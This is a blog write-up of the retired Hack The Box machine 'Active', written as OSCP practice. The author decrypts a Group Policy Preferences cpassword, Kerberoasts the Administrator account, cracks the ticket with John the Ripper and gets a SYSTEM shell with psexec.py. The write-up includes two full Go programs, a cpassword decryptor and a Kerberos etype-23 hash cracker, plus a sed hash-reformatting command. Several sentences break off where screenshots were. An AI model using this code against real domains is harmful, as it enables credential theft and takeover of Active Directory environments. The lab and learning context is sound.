Road to OSCP: HTB Series: Active Writeup
Continuing on my road to OSCP certification, I am in the midst of preparing for the exam in January. Part of my preparation is taking on the retired machines available on the Hack The Box (HTB) platform. HTB is a great platform for practising and learning new penetration testing skills, as well as for taking on the challenge of “capturing the flag” on their machines.
In this HTB series I will be sharing my write-ups on all the retired machines I have attempted. If you are wondering, “How does he know which machines to do to prepare for OSCP?”, I am using TJNull’s list of OSCP-like HTB boxes, which can be found here.
This box is pretty cool and I immediately wanted to do a write-up right after finishing it.
What is interesting about this box is more of a personal challenge. I am not usually the most comfortable when it comes to attacking a Windows machine, and especially enumerating the SMB service and figuring out the right share or location for the files I need. This machine really challenged me in that aspect, and also let me put into practice Kerberoasting, which I also learnt in the OSCP course.
As per usual, I begin my enumeration with AutoRecon, developed and scripted by Tib3rius. Check out his Twitter account for voucher codes for his privilege escalation course as well! Now looking at the screenshots of what I got:
This is one of the reasons why I am not usually fond of Windows targets: many RPC ports, and sometimes ports I do not have very strong knowledge of. Still, some things we can tell from this scan: the machine is running Active Directory and exposes a Kerberos service (TCP 88). DNS on port 53 (open on UDP) is another strong hint that this machine is a Domain Controller, since DCs normally host the domain’s DNS zone.
Through smbmap, AutoRecon also presented several interesting findings within the SMB service. We see that as an anonymous user (a null session, no credentials at all) we have Read access to the
smbmap also lists the contents of the readable share:
We see there are a couple of folders and files that we can look at, so let’s go in with smbclient to manually enumerate the share:
As we enumerate through the share, we come across several interesting files: GPT.INI, GPE.INI, GPTTmpl.inf and Groups.xml. These are the files that make up a Group Policy Object, normally found under SYSVOL on a Domain Controller and readable by every domain member. Googling them gives us the reading below:
Architecture of Windows Group Policy for Windows Server 2008 and Windows Vista
There have been some radical changes to the underlying implementation of Group Policy with Windows Vista and Windows…
We then Google more about Groups.xml and find that the cpassword attribute in the file holds the account’s password encrypted, not hashed. It is AES-256 with a static key that Microsoft itself published in the MS-GPPREF specification, so anyone who can read the file can decrypt it; no cracking is needed. This is why MS14-025 (May 2014) removed the ability to set passwords through Group Policy Preferences, although Groups.xml files that already existed were left in place. Using the following link as reference:
Credential Dumping: Group Policy Preferences (GPP)
People might be aware of "Group Policy Preferences" in Windows Server 2008 that allows system administrators to set up…
We then use gpp-decrypt, which ships with Kali and takes the cpassword value as its only argument:
We then obtain the password for
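To make the decryption step concrete, below is an added example (mine, not the author’s and not gpp-decrypt’s own source) that does what gpp-decrypt does: it reads the cpassword attributes out of a Groups.xml document and decrypts them with the static AES-256 key from MS-GPPREF. The key is the one Microsoft published; everything else is assumed for the example: the account name, password and Groups.xml document are constructed here and are not the ones from the box, and EncryptCpassword exists only so the sample file can be generated and round-tripped offline.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"encoding/xml"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// gppKey is the AES-256 key published in MS-GPPREF 2.2.1.1.4; it is the same on every domain.
var gppKey, _ = hex.DecodeString("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

// DecryptCpassword does what gpp-decrypt does: restore the base64 padding GPP strips,
// AES-256-CBC with an all-zero IV, remove the PKCS#7 padding, decode the UTF-16LE text.
func DecryptCpassword(cpassword string) (string, error) {
	s := strings.TrimSpace(cpassword)
	if m := len(s) % 4; m != 0 {
		s += strings.Repeat("=", 4-m)
	}
	ct, err := base64.StdEncoding.DecodeString(s)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("cpassword is not base64 of a whole number of AES blocks")
	}
	block, _ := aes.NewCipher(gppKey) // the key length is fixed, so this cannot fail
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad PKCS#7 padding: wrong key or corrupt value")
	}
	pt = pt[:len(pt)-n]
	u := make([]uint16, len(pt)/2)
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncryptCpassword is the forward direction (what the policy editor did when an admin set
// a password); it is here only so the example can round-trip a constructed value.
func EncryptCpassword(password string) string {
	var pt []byte
	for _, c := range utf16.Encode([]rune(password)) {
		pt = append(pt, byte(c), byte(c>>8))
	}
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	pt = append(pt, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(gppKey)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, pt)
	return strings.TrimRight(base64.StdEncoding.EncodeToString(ct), "=")
}

// Cred is one <User> preference item with its cpassword decrypted.
type Cred struct{ UserName, Password string }

// ExtractCreds parses a Groups.xml document and decrypts every cpassword attribute in it.
func ExtractCreds(doc []byte) ([]Cred, error) {
	var g struct {
		Users []struct {
			P struct {
				UserName  string `xml:"userName,attr"`
				Cpassword string `xml:"cpassword,attr"`
			} `xml:"Properties"`
		} `xml:"User"`
	}
	if err := xml.Unmarshal(doc, &g); err != nil {
		return nil, err
	}
	var out []Cred
	for _, u := range g.Users {
		if u.P.Cpassword == "" { // items that only rename or disable an account carry no password
			continue
		}
		pw, err := DecryptCpassword(u.P.Cpassword)
		if err != nil {
			return nil, err
		}
		out = append(out, Cred{u.P.UserName, pw})
	}
	return out, nil
}

// SampleGroupsXML is a constructed Groups.xml in the layout GPP writes; account and password are made up.
func SampleGroupsXML() []byte {
	return []byte(`<?xml version="1.0" encoding="utf-8"?>` +
		`<Groups><User name="svc_example"><Properties action="U" cpassword="` + EncryptCpassword("Summer2018!") +
		`" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="CORP\svc_example"/></User></Groups>`)
}

func main() {
	creds, err := ExtractCreds(SampleGroupsXML())
	fmt.Println(creds, err)
}
```

The padding check matters in practice: a cpassword that was truncated when copied out of a screenshot or terminal still base64-decodes, but the PKCS#7 check fails instead of returning mojibake, which is the usual symptom when gpp-decrypt “works” but prints garbage.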
Using the credentials we obtained, we enumerate SMB again, this time authenticated, with
Now we have read access to more shares! In the course of our enumeration with smbmap, we find
While it is tempting to just pull it down and read it, I really do not want to do that, because in the OSCP exam it is a requirement to obtain a shell before reading the flags. So let’s keep to that practice for the sake of exam preparation.
Now we need to find a way to escalate from here! psexec.py from Impacket works by uploading a service binary to a writable share (typically ADMIN$) and creating a Windows service from it, so it needs an account with local administrator rights on the target and write access to a share. If we can get that, we get a shell as SYSTEM.
Now that we have the password of a domain user, let’s try to get the password of Administrator. Since this machine uses Kerberos for authentication, we can ask the Domain Controller which Service Principal Names (SPNs) are registered to user accounts and request a service ticket (TGS) for each of them; any authenticated domain user is allowed to do this. The ticket is encrypted with a key derived from the service account’s password, so it can be cracked offline without ever touching the account. This is Kerberoasting, and if an SPN is registered to a privileged account, cracking its ticket gives us that account’s password.
We obtain a ticket for an SPN registered to the Administrator account. Let’s save it to an output file:
Then we want to clean up the file so it is ready for John the Ripper. The sed below rewrites the older “$krb5tgs$<user>:<hash>” layout into the “$krb5tgs$23$*<user>*$<hash>” layout that John’s krb5tgs format expects, where 23 is the RC4-HMAC encryption type (etype) of the ticket:
cat JtR | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
Then, using the rockyou.txt wordlist and John the Ripper:
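What John actually does with each line of that file is worth seeing once, so here is an added example of my own (not the author’s code and not John’s source) that parses the “$krb5tgs$23$*user$REALM$spn*$checksum$edata2” layout the sed above produces and runs the RC4-HMAC (etype 23) check from RFC 4757 against a candidate password: derive the NT hash, then K1, then K3 from the checksum, RC4-decrypt the ticket and see whether the HMAC matches. MD4 is implemented inline because Go’s standard library does not ship it. Everything about the sample ticket is assumed: the principal, password and ticket body are constructed here, and SampleHash mimics the KDC only so the example has an offline test vector; no hash from the box is reproduced.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"crypto/rc4"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
	"math/bits"
	"strings"
	"unicode/utf16"
)

// md4 (RFC 1320) is here because the etype-23 key is the NT hash, i.e. MD4 of the UTF-16LE password.
func md4(data []byte) []byte {
	fs := []func(x, y, z uint32) uint32{
		func(x, y, z uint32) uint32 { return x&y | ^x&z },
		func(x, y, z uint32) uint32 { return x&y | x&z | y&z },
		func(x, y, z uint32) uint32 { return x ^ y ^ z },
	}
	ks := [3]uint32{0, 0x5a827999, 0x6ed9eba1}
	idx := [3][16]int{{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15}, {0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15}, {0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}}
	sh := [3][4]int{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}
	v := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	// padding: 0x80, zeros up to 56 mod 64, then the message length in bits, little-endian
	msg := append(append(append([]byte{}, data...), 0x80), make([]byte, (55-len(data)%64+64)%64+8)...)
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	for off := 0; off < len(msg); off += 64 {
		blk, w := msg[off:off+64], v
		for r := 0; r < 3; r++ {
			for n := 0; n < 16; n++ {
				i := (4 - n%4) % 4 // a, d, c, b are updated in turn
				w[i] = bits.RotateLeft32(w[i]+fs[r](w[(i+1)%4], w[(i+2)%4], w[(i+3)%4])+binary.LittleEndian.Uint32(blk[4*idx[r][n]:])+ks[r], sh[r][n%4])
			}
		}
		v[0], v[1], v[2], v[3] = v[0]+w[0], v[1]+w[1], v[2]+w[2], v[3]+w[3]
	}
	out := make([]byte, 16)
	for i, w := range v {
		binary.LittleEndian.PutUint32(out[4*i:], w)
	}
	return out
}

func hmacMD5(key, data []byte) []byte {
	m := hmac.New(md5.New, key)
	m.Write(data)
	return m.Sum(nil)
}

// NTHash = MD4(UTF-16LE(password)) is the service account's long-term RC4-HMAC key.
func NTHash(password string) []byte {
	var b []byte
	for _, c := range utf16.Encode([]rune(password)) {
		b = append(b, byte(c), byte(c>>8))
	}
	return md4(b)
}

func rc4x(key, data []byte) []byte {
	c, _ := rc4.NewCipher(key) // deprecated in Go, but etype 23 is RC4 by definition
	out := make([]byte, len(data))
	c.XORKeyStream(out, data)
	return out
}

// CheckCandidate is the per-guess test john runs (RFC 4757, key usage 2 = TGS-REP enc-part):
// K1 = HMAC-MD5(NT, usage), K3 = HMAC-MD5(K1, checksum), pt = RC4(K3, edata2); match iff HMAC-MD5(K1, pt) == checksum.
func CheckCandidate(checksum, edata2 []byte, password string) bool {
	k1 := hmacMD5(NTHash(password), []byte{2, 0, 0, 0})
	return hmac.Equal(hmacMD5(k1, rc4x(hmacMD5(k1, checksum), edata2)), checksum)
}

// ParseHash splits a "$krb5tgs$23$*user$REALM$spn*$checksum$edata2" line (the form John expects).
func ParseHash(line string) (checksum, edata2 []byte, err error) {
	i := strings.LastIndex(line, "*$")
	parts := strings.Split(line[i+2:], "$")
	if !strings.HasPrefix(line, "$krb5tgs$23$*") || i < 0 || len(parts) != 2 {
		return nil, nil, errors.New("not an etype-23 krb5tgs line")
	}
	if checksum, err = hex.DecodeString(parts[0]); err != nil || len(checksum) != md5.Size {
		return nil, nil, errors.New("checksum must be 16 hex-encoded bytes")
	}
	edata2, err = hex.DecodeString(parts[1])
	return checksum, edata2, err
}

// SampleHash mimics the KDC encrypting a ticket under the service account's key; body is a constructed stand-in for confounder||EncTicketPart.
func SampleHash(principal, password string, body []byte) string {
	k1 := hmacMD5(NTHash(password), []byte{2, 0, 0, 0})
	cs := hmacMD5(k1, body)
	return fmt.Sprintf("$krb5tgs$23$*%s*$%x$%x", principal, cs, rc4x(hmacMD5(k1, cs), body))
}

func main() {
	cs, ed, _ := ParseHash(SampleHash("svc_example$CORP.LOCAL$CORP.LOCAL/svc_example", "Winter2019!", []byte("constructed ticket body")))
	fmt.Println(CheckCandidate(cs, ed, "password"), CheckCandidate(cs, ed, "Winter2019!"))
}
```

Two things follow from the check. First, the whole cost per guess is one MD4, three HMAC-MD5s and one RC4, which is why etype-23 tickets crack so fast and why defenders prefer AES-only service accounts. Second, the checksum is sent in the clear inside the TGS-REP, so the only secret in the exchange is the service account’s password; nothing else has to be stolen.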
Now we know the password of the
Using smbmap with the new credentials to check our permissions on the shares:
We have read and write access! That is exactly what psexec.py needs, so we can use it to obtain a remote shell on the machine:
We have successfully gained a shell with Administrator privileges (the service psexec.py creates runs as NT AUTHORITY\SYSTEM). Grabbing the
I learnt more about the Windows feature of Group Policy Preferences and how it is used in Windows Server 2008. I also saw how, when the preference items are not secured properly, passwords can easily be stolen, as in this case where we could read the Groups.xml file containing the cpassword that can be decrypted to obtain the plaintext password. I also had a chance to practise Kerberoasting and recalled the use cases of psexec to obtain a shell. Overall, I really enjoyed this machine!
Thank you for reading! As always, if you enjoy these write-ups, subscribe to my publications or follow me on Twitter @lojomojo96 and hit me up with a DM! It will really encourage me to write and share even as I prepare for my OSCP certification. Of course, if there are points to improve upon in my own methodology, do let me know too! You can also find me on LinkedIn.